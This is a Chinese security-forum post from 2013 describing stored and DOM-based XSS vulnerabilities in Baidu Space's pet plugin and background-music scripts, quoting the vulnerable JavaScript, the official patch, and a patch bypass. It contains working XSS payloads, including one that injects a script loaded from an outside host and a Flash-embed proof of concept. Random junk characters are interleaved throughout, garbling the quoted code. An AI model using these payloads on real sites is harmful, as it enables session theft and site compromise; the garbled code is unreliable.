中国网络渗透测试联盟

标题: hi.baidu Xss 漏洞 [打印本页]
作者: admin    时间: 2013-8-24 11:51
标题: hi.baidu Xss 漏洞
百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.  
" D6 W9 Y: X- ]
6 `: T( f7 q+ o/ Q1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.  
2 s8 }1 v6 N6 e/ m2.在http://hi.baidu.com/ui/scripts/pet/pet.js中  % p, z4 w" c3 f' z3 s; R$ d
5 R0 M5 P3 a0 {7 }! F
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>  ' w" z$ D0 E- C/ U/ H; D$ t
其中BdUtil.insertWBR为  ( q! D. \) @* D# s2 ?" z/ ?, M
function(text, step) {  + y0 ?" w# t- {+ \
    var textarea = textAreaCache || getContainer();  
& ~) g9 l* ^0 L0 q0 ^$ a    if (!textarea) {  2 C, R3 N7 h7 n- u
        return text;  ! p% e4 e9 F: \! N0 M5 S
    }  
/ C9 ~) S' Q/ M8 Y4 H    textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");  
6 N7 l2 H* Q( R/ ]7 C    var string = textarea.value;  
- `4 T  W! i) v' |+ y    var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");  
5 b" F5 {. a  I- v, w. F5 n    var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");  - f& @' A& w6 W3 H/ ]
    return result;  
6 c8 x3 i* Y* t  D9 N9 M}  
* F5 r( R4 N+ C( ^在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.  
, h4 J0 y) m4 x: x测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>  / G5 J, S4 ]8 Z$ F
   * W# s$ [# s8 {. d4 W1 H
二:creatbgmusic() Dom-Xss Bug  
4 N$ r! J: N: Q0 J$ p百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞  
- X1 _( A; l; Q: P1 t1 I+ ?) R  P3 W
http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码:  ! W* m( w* y/ ]' I
1 p7 Y( r  t7 n+ @
function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {  
. \1 j  W. c! E9 G    //传入的murl赋值到bgmusic1和bgmusic2中  + p, j& l4 h2 i, J
    //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1  9 Q, a# F8 q9 \8 \- }( o
    var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\"  VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";  % p; `6 M, _5 t! y/ h
    if (musicnum <= 1) {  
+ u1 M" F' {" v# r: g. }2 S        bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";  
1 E. L: Y" |7 F4 f) ]    }  * b) o& ^/ M! t* G% g
    bgmusic1 += "</OBJECT>";  
9 m. n0 X4 l/ g/ y/ W. ?    var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";  1 e# x, h* k+ x  A
    if (musicnum <= 1) {  8 \4 w8 h0 ^; W% H" U* V/ w
        bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";  
3 S  b' Y* L7 l: Q    }  - r+ i0 q) |6 t) Z+ @3 A; a
    bgmusic2 += "> </EMBED>";  $ r1 F2 I! P/ G+ q  p) j
    var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";  8 ?- j* r( a7 A' G0 s
    var bgmus = detectWMP();  
7 q& ?6 ]0 l* ~. s2 q- V# O    if (functype == "FckMusicHelper") {  
8 c  s& D+ }) u! K9 s        if (bgmus.installed) {  . S5 {5 L  M! K8 {: D0 |4 K
            if (bgmus.type == "IE") {  $ e- |3 p8 @. ~. p$ K8 O: o! a
                return bgmusic1;  
$ W4 X. g/ |* j            } else if (bgmus.type == "NS") {  
# i/ q/ o2 s/ W                return bgmusic2;  4 r- b8 Y* c* X) Q: ~  K+ S
            }  : i2 R8 V# @8 v* P( E5 V
        } else {  , O4 E( h' t; v5 U. |3 R9 @
            return bgmusic3;  & v- o+ f3 G6 R0 Z6 H
        }  0 _9 S( ^) V! R& D# U
    } else {  
4 a6 Y0 T! K( }8 B- K  i        if (bgmus.installed) {  
# M) X, G/ t  P) Y8 w9 ~% k            //document.write 直接输出bgmusic变量 导致xss  
* W* [" g( n5 N# L$ Q$ @            if (bgmus.type == "IE") {  
5 Y. c9 p2 i! v$ e& T4 O5 _                document.write(bgmusic1);  4 [0 h) E1 ^5 B* |+ \- Z
            } else if (bgmus.type == "NS") {  
) O6 w$ U0 L  n4 j8 c4 B0 B                document.write(bgmusic2);  
5 m  P9 H* t) R7 D) b            }  , J! G. {  b) W9 M; Q  G
        } else {  2 H% E! C# S3 h( a
            document.write(bgmusic3);  ( k0 R! {3 `" \- R, y8 ?. e1 s
        }  * _; r( g& u- X1 X# a
        return "";  
' Q/ `! b7 ~, C2 i  v7 R  k    }  
: n0 G, B- c3 T$ P}  
* U8 u8 J4 M, ?0 \. M3 P  W% O* W
7 {/ C4 H: W3 f( Y在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:  & u5 Y% g; M2 _0 x/ @% f
4 y4 k: ^7 [6 m. f9 s
function initBlogTextForFCK(){  
  a/ T+ W8 T% T, {; L) x8 c! t//fck init music  . _' Y1 d0 }" ]6 I
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}  ' j! `) s, h4 Y; ]3 k
var imgBox=document.getElementsByName(’musicName’);   //取得了文章中的所有name="musicName"的标签数组  
; k; I! A$ F/ V4 Evar isAutoPlay=true;  
- ~& O7 D  Z* k/ A) X* M; S, `2 c5 Wfor(var i=0,n=imgBox.length;i<n;i++){  //然后遍历.  
. \9 @0 r* c$ Z9 Q  var img=imgBox;  
. _/ `: T2 [( G0 T4 J# D- M- C6 \  if(img.getAttribute(’rel’)){        
9 Y: h3 ]# T! d3 R1 f6 |, a   var musicSrc=img.getAttribute(’rel’);    //取得标签中rel的值,赋值给musicSrc  
2 p0 b) I( I$ l0 S   var musicDiv = document.createElement("SPAN");  
4 A) z8 L! Z: [; O1 |   var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1);  //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]  
, n9 a+ F, N+ Y% p     
1 F  J0 D, j* Z      ..........................  
/ L0 r8 s; u7 S" v: o9 g5 D. ]+ d# u     
0 B) v4 y; ~5 g- H   //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.   
  J/ c9 Z/ I5 r   var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);  
1 }4 n5 `* i4 M0 p   shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’);   img.replaceNode(musicDiv);  
9 C4 v1 }( j6 X/ o" I5 m   musicDiv.innerHTML=shtml;  : k6 e1 S" `6 W/ d/ x$ i# Q  }# G
   i--;n--;  " C) O) J$ w, J6 n# o
  }  1 B" F" ], w; E8 A5 K. z* r
}  . l% P2 H! n: t* v4 b" E
2 q( D7 o# e+ l  p
从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.  
- n$ Z+ H% c* r3 W) H, G/ ~1 h& M   / C* }) @1 |3 ?* N; {) b4 H
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>  ) `# v& G; X, x' }6 {& {1 j
$ f' f8 z( {) H( u, g/ U
等待官方补丁  7 r% l4 L# c& x! P9 e2 c7 S
( k! `2 [" {2 y' N" ]+ K
update 2010年5月13日   
1 E9 s* U9 F3 \! C9 `1 Q: ~" Q, Q2 y& @
官方补丁:  % G* k6 X+ e9 g9 \; u

, e! t' b/ E5 ]) m6 Ivar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);  " I0 P) B# ?9 W+ ~8 E! Z* c/ f) M
改为:  
1 f3 V$ ^& L" p3 h* lvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);  ) Y" J0 X" @2 b! z

5 U3 T  }; P: A- aupdate 2010年5月13日 21:50:37  
, `, N: @2 G6 _! Q- A+ v0 @$ k8 s! |: M# D) y$ V
补丁存在漏洞 没有过滤" 可以继续跨:  4 v" C' W1 F) J

" C+ q5 A$ N& F# u* vNEW POC:  
& f: l7 c# [1 q8 \  P" X( z- {1 ?( i* C/ o6 b  u! O
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf"
' f( C" _/ H; B& c4 M: n- U. h4 N' W4 w' d! y& g* t% A
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>) \# Q0 H% V, J1 b

; D) R" w+ ~. ]) e* H



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2